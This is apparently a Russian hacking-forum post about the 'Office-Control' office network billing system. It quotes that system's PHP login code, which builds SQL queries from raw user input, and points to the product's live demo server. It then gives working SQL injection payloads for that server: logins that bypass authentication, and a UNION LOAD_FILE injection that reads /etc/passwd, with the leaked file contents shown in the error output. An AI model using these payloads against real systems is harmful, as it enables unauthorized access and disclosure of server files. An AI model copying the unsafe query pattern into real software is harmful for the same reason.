Форум АНТИЧАТ - Office-Control

Система "Office-Control" предназначена для управления, биллинга и защиты сетей офисов

первое что сразу же попалось на глаза:

http://office-control.org/svn/repos/client_web/www/classes/base/session.php

PHP код:


		
			
    public function Login($strUsername, $strPlainPassword, $admin=0) {

        $strMD5Password = md5($strPlainPassword);

        if ($admin==0)

              $stmt = "select id FROM clients WHERE login = '$strUsername' AND password = '$strMD5Password'";

          else

            $stmt = "select id FROM admins WHERE login = '$strUsername' AND password = '$strMD5Password'";

client.office-control.org - Демо-версия WEB-клиента. имя - new, пароль - 123.

Вход без пароля:

Код:

Login: ' or 1=1/*

Password: never mind



Login: 123'/*

Password: never mind

Есть права для работы с файлами:

Код:

Login: a' union select LOAD_FILE('/etc/passwd')/*

Password: never mind

Код:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon' at line 1